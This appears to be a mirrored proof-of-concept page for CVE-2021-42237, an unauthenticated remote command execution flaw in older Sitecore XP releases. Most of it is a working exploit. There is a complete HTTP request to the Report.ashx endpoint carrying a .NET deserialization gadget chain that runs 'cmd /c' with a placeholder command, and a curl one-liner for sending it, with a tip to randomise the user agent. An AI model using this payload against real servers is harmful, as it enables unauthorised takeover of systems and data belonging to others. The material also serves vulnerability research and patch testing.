CVE-2021-42237 PoC — Sitecore 代码问题漏洞

Source

https://github.com/ItsIgnacioPortal/CVE-2021-42237

Associated Vulnerability

Title:Sitecore 代码问题漏洞 (CVE-2021-42237)
Description:Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

Description

An exploit/PoC for CVE-2021-42237

Readme

# CVE-2021-42237
This is an exploit/PoC for CVE-2021-42237 taken from: [This Assetnote report](https://blog.assetnote.io/2021/11/02/sitecore-rce/)

DISCLAIMER: I'm not associated with Assetnote in any way or form. This content is provided for educational porpouses only.

Make sure to replace `CMD-COMMAND-HERE`, as well as the Host, from the PoC below:

```powershell
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host: sitecore.local
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Content-Type: text/xml
Content-Length: 5919

<?xml version="1.0" ?>
<a>
    <query></query>
    <source>foo</source>
    <parameters>
        <parameter name="">
            <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
                xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
                xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
                xmlns:x="http://www.w3.org/2001/XMLSchema"
                xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
                <Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
                    xmlns="">2</Count>
                <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
                    xmlns="">
                    <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
                        xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
                        xmlns:a="http://schemas.datacontract.org/2004/07/System">
                        <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
                            xmlns="">
                            <a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
                            <a:delegateEntry z:Id="7">
                                <a:assembly z:Ref="6" i:nil="true"/>
                                <a:delegateEntry i:nil="true"/>
                                <a:methodName z:Id="8">Compare</a:methodName>
                                <a:target i:nil="true"/>
                                <a:targetTypeAssembly z:Ref="6" i:nil="true"/>
                                <a:targetTypeName z:Id="9">System.String</a:targetTypeName>
                                <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
                            </a:delegateEntry>
                            <a:methodName z:Id="11">Start</a:methodName>
                            <a:target i:nil="true"/>
                            <a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
                            <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
                            <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
                        </Delegate>
                        <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
                            xmlns=""
                            xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
                            <Name z:Ref="11" i:nil="true"/>
                            <AssemblyName z:Ref="12" i:nil="true"/>
                            <ClassName z:Ref="13" i:nil="true"/>
                            <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
                            <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
                            <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
                            <GenericArguments i:nil="true"/>
                        </method0>
                        <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
                            xmlns=""
                            xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
                            <Name z:Ref="8" i:nil="true"/>
                            <AssemblyName z:Ref="6" i:nil="true"/>
                            <ClassName z:Ref="9" i:nil="true"/>
                            <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
                            <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
                            <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
                            <GenericArguments i:nil="true"/>
                        </method1>
                    </_comparison>
                </Comparer>
                <Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
                    xmlns="">2</Version>
                <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
                    xmlns="">
                    <string z:Id="25"
                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c CMD-COMMAND-HERE</string>
                    <string z:Id="26"
                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
                </Items>
            </ArrayOfstring>
        </parameter>
    </parameters>
</a>

```

Here's a one-liner command, just make sure to modify **HOST-HERE** and **CONTENTLENGTH-HERE**, and use [a random useragent](https://generatefakename.com/user-agent)
```bash
curl -i -X POST HOST-HERE/sitecore/shell/ClientBin/Reporting/Report.ashx \
  -H "Accept-Encoding: gzip, deflate" \
  -H "Accept: */*" \
  -H "Accept-Language: en" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" \
  -H "Connection: close" \
  -H "Content-Type: text/xml" \
  -H "Content-Length: CONTENTLENGTH-HERE" \
  --data-binary "@CVE-2021-42237.xml"
```

File Snapshot


 [4.0K]  /data/pocs/cc9834249ad6991806655d540ed7dc25466f046b
├── [5.7K]  CVE-2021-42337.xml
└── [7.0K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!